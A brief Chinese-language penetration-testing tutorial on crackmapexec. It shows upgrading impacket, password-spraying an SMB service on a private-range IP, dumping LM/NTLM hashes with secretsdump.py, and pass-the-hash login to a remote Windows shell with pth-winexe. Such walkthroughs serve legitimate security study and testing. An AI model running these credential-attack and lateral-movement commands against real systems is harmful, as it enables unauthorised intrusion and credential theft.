crackmapexec(簡稱CME)是一個用於渗透測試和紅隊操作的自動化工具。它是一個功能豐富的命令行工具,用於快速而有效地執行各種渗透測試和攻擊,特別是針對Windows環境。
安裝 crackmapexec
crackmapexec 有用到 impacket 套件,先查看 impacket 版本,太舊要升級,建議 impacket 0.10.0 以上。python3 -m pip list | grep impacket
升級python3 -m pip install --upgrade impacket
使用 crackmapexec 工具針對 SMB 服務執行弱帳密破解攻擊的命令crackmapexec smb 192.168.0.7 -u Wordlists/Usernames.txt -p 'Pa$$w0rd'
得到帳密後,可以利用 winexe 工具登入到 Windows 的 CMD。
取得帳密後,也可以做橫移攻擊
先提取 LM 和 NTLM 雜湊secretsdump.py 'administrator:Pa$$word'@192.168.0.7
使用先前提取的 LM 雜湊和 NTLM 雜湊來進行身份驗證,然後在遠端 Windows 主機上運行命令。pth-winexe –U 'Username%<LM_hash:NTLM_hash>' //<IP> cmd.exe
登入成功!